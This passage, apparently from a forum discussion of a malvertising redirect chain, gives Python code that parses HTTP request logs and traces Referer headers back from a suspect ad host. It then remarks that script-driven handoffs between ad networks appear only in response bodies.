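REFERER = re.compile(r"^Referer: (\S+)$", re.IGNORECASE)

def parse_requests(log):
    """Return [(url, referer or None), ...] in log order."""
    requests = []
    for line in map(str.strip, log.splitlines()):
        if (m := REQUEST.match(line)):
            requests.append((m.group(1), None))
        elif requests and (m := REFERER.match(line)):
            requests[-1] = (requests[-1][0], m.group(1))
    return requests

def referred_from(requests, root_host):
    """URLs whose Referer chain leads back to a page on root_host."""
    tainted = []
    for url, referer in requests:
        if urlsplit(url).hostname == root_host or referer in tainted:
            tainted.append(url)
    return tainted

def backtrace(requests, suspect_host):
    """Follow Referer headers back from the first request to suspect_host."""
    idx = next((i for i, (url, _) in enumerate(requests)
                if urlsplit(url).hostname == suspect_host), None)
    chain = []
    while idx is not None:
        url, referer = requests[idx]
        chain.append(url)
        # Parent = most recent earlier request for the Referer URL.
        idx = next((j for j in range(idx - 1, -1, -1)
                    if requests[j][0] == referer), None)
    return chain[::-1]

if __name__ == "__main__":
    print(backtrace(parse_requests(SAMPLE_LOG), "go.goadvs.com"))
```

As in the capture in the first post, the vindicosuite request carries the Slickdeals page itself as its Referer, so the openx step never appears in the backtrace. A handoff made by script inside a document shows up only in the response bodies.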